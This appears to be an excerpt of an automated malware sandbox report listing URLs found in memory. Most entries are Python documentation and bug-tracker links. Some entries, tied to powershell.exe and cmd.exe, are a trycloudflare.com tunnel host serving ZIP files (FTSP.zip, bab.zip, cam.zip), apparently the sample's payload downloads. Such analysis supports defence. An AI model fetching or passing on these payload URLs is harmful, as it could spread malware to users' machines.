                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29240
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29286
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29300
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29302
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29377
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29452
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29469
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29507
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29546
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29576
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29585
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29654
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29679
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29708
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29728
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=2983
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29851
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29962
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29970
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29979
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29995
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30014
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30024
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30050
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30054
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30095
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30103
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30215
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30241
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30285
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30291
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30302
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30349
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30362
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30399
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30406
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30436
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30450
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30508
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30520
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30522
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30526
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30537
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30541
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30579
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30596
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30622
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30693
                Source: 3.7.html.24.dr, 3.6.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30697
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30708
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30794
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30897
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31072
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31080
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31128
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31151
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31179
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31233
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31245
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31333
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31338
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31344
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31353
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31368
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31370
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31389
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31399
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31415
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31429
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31540
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31558
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31574
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31638
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31639
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31648
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31650
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31664
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31671
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31690
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31702
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31709
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31756
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31778
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31801
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31819
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31843
                Source: 3.7.html.24.dr, 3.6.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31860
                Source: 3.7.html.24.dr, 3.6.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31900
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31943
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31945
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31970
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31975
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31985
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32012
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32023
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32025
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32043
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32066
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32071
                Source: 3.7.html.24.dr, 3.8.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32102
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32107
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32121
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32185
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32193
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32206
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32226
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32227
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32230
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32248
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32250
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32251
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32253
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32265
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32269
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32296
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32303
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32304
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32305
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32308
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32311
                Source: 3.7.html.24.dr, 3.8.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32314
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32320
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32327
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32331
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32348
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32351
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32355
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32356
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32373
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32391
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32403
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32410
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32415
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32418
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32433
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32436
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32441
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32454
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32544
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32550
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32585
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32591
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32609
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32630
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32659
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32662
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32670
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32677
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32690
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32717
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32741
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32792
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32947
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32951
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33053
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33097
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33169
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33217
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33540
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33618
                Source: 3.7.html.24.dr, 3.6.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33642
                Source: 3.7.html.24.dr, 3.6.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33656
                Source: 3.7.html.24.dr, 3.6.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33679
                Source: 3.7.html.24.dr, 3.6.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33768
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33792
                Source: 3.7.html.24.dr, 3.6.html.24.dr, 3.8.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33899
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=34247
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=3439
                Source: 3.7.html.24.dr, contextvars.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=34762
                Source: 3.7.html.24.dr, 3.6.html.24.dr, 3.9.html.24.dr, 3.8.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=37228
                Source: 3.7.html.24.dr, 3.8.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=37627
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4136
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4195
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4201
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4258
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4285
                Source: 3.7.html.24.dr, 3.6.html.24.dr, 3.9.html.24.dr, 3.8.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=42967
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4384
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4688
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4707
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4739
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4753
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4868
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4910
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5084
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5150
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5175
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5228
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5237
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5288
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5630
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5675
                Source: 3.7.html.24.dr, 3.8.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5680
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5914
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=6137
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=6532
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=7769
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=9850
                Source: 3.1.html.24.drString found in binary or memory: https://codereview.appspot.com/53094
                Source: powershell.exe, 0000000D.00000002.1819134442.00000242B45EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 0000000D.00000002.1819134442.00000242B45EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 0000000D.00000002.1819134442.00000242B45EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: 3.7.html.24.dr, 3.9.html.24.dr, 3.8.html.24.drString found in binary or memory: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10735
                Source: time.html.24.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc1123.html
                Source: xmlrpc.client.html.24.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc2045.html#section-6.8
                Source: 3.7.html.24.dr, urllib.parse.html.24.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc2396.html
                Source: time.html.24.dr, stdlib.html.24.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc2822.html
                Source: 2.4.html.24.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc3548.html
                Source: 3.7.html.24.dr, 3.9.html.24.dr, 3.8.html.24.dr, urllib.parse.html.24.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc3986.html
                Source: time.html.24.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc822.html
                Source: 2.4.html.24.drString found in binary or memory: https://developer-old.gnome.org/glib/2.26/
                Source: 3.4.html.24.drString found in binary or memory: https://docs.python.org/3.4/whatsnew/changelog.html
                Source: 3.7.html.24.dr, 3.1.html.24.dr, expressions.html.24.dr, 2.4.html.24.dr, typehints.html.24.dr, tomllib.html.24.dr, time.html.24.dr, sys.html.24.dr, urllib.html.24.dr, contextvars.html.24.dr, unittest.mock.html.24.dr, bytes.html.24.dr, xmlrpc.client.html.24.dr, iterator.html.24.dr, gcsupport.html.24.dr, xml.etree.elementtree.html.24.dr, token.html.24.dr, 2.0.html.24.dr, xml.dom.html.24.dr, 3.4.html.24.dr, appendix.html.24.drString found in binary or memory: https://docs.python.org/3/_static/og-image.png
                Source: bytes.html.24.drString found in binary or memory: https://docs.python.org/3/c-api/bytes.html
                Source: contextvars.html.24.drString found in binary or memory: https://docs.python.org/3/c-api/contextvars.html
                Source: gcsupport.html.24.drString found in binary or memory: https://docs.python.org/3/c-api/gcsupport.html
                Source: iterator.html.24.drString found in binary or memory: https://docs.python.org/3/c-api/iterator.html
                Source: sys.html.24.drString found in binary or memory: https://docs.python.org/3/c-api/sys.html
                Source: typehints.html.24.drString found in binary or memory: https://docs.python.org/3/c-api/typehints.html
                Source: time.html.24.drString found in binary or memory: https://docs.python.org/3/library/time.html
                Source: token.html.24.drString found in binary or memory: https://docs.python.org/3/library/token.html
                Source: tomllib.html.24.drString found in binary or memory: https://docs.python.org/3/library/tomllib.html
                Source: unittest.mock.html.24.drString found in binary or memory: https://docs.python.org/3/library/unittest.mock.html
                Source: urllib.html.24.drString found in binary or memory: https://docs.python.org/3/library/urllib.html
                Source: xml.dom.html.24.drString found in binary or memory: https://docs.python.org/3/library/xml.dom.html
                Source: xml.etree.elementtree.html.24.drString found in binary or memory: https://docs.python.org/3/library/xml.etree.elementtree.html
                Source: xmlrpc.client.html.24.drString found in binary or memory: https://docs.python.org/3/library/xmlrpc.client.html
                Source: expressions.html.24.drString found in binary or memory: https://docs.python.org/3/reference/expressions.html
                Source: 2.0.html.24.drString found in binary or memory: https://docs.python.org/3/whatsnew/2.0.html
                Source: 2.4.html.24.drString found in binary or memory: https://docs.python.org/3/whatsnew/2.4.html
                Source: 3.1.html.24.drString found in binary or memory: https://docs.python.org/3/whatsnew/3.1.html
                Source: 3.4.html.24.drString found in binary or memory: https://docs.python.org/3/whatsnew/3.4.html
                Source: 3.7.html.24.drString found in binary or memory: https://docs.python.org/3/whatsnew/3.7.html
                Source: 3.7.html.24.drString found in binary or memory: https://docs.python.org/fr/
                Source: 3.7.html.24.drString found in binary or memory: https://docs.python.org/ja/
                Source: 3.7.html.24.drString found in binary or memory: https://docs.python.org/ko/
                Source: powershell.exe, 0000000D.00000002.1774446533.00000242A47A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://german-tan-exotic-collectibles.trycloudflare.com
                Source: powershell.exe, 0000000D.00000002.1822344159.00000242BC690000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1774093897.00000242A4023000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1773558872.00000242A2738000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1774005092.00000242A2854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://german-tan-exotic-collectibles.trycloudflare.com/FTSP.zip
                Source: powershell.exe, 0000000D.00000002.1773558872.00000242A2738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://german-tan-exotic-collectibles.trycloudflare.com/FTSP.zip3.6S
                Source: cmd.exe, 00000005.00000003.1243856020.0000023995B54000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1774093897.00000242A4023000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1774005092.00000242A2856000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1774005092.00000242A2854000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1773558872.00000242A2730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://german-tan-exotic-collectibles.trycloudflare.com/FTSP.zipHOMEDRIVE=C:HOMEPATH=
                Source: powershell.exe, 0000000D.00000002.1773558872.00000242A2738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://german-tan-exotic-collectibles.trycloudflare.com/FTSP.zipI.lS
                Source: powershell.exe, 0000000D.00000002.1773558872.00000242A2730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip
                Source: cmd.exe, 00000005.00000002.2455424741.0000023995AE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip...
                Source: powershell.exe, 0000000D.00000002.1773558872.00000242A2738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://german-tan-exotic-collectibles.trycloudflare.com/bab.zipr
                Source: powershell.exe, 0000000D.00000002.1822344159.00000242BC690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://german-tan-exotic-collectibles.trycloudflare.com/bab.zipy
                Source: cmd.exe, 00000005.00000002.2455424741.0000023995B03000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1533893549.0000023995B03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://german-tan-exotic-collectibles.trycloudflare.com/cam.zip
                Source: git.py.24.drString found in binary or memory: https://git-scm.com/docs/partial-clone
                Source: constants.py.24.dr, sslproto.py.24.drString found in binary or memory: https://github.com/MagicStack/uvloop/tree/v0.16.0
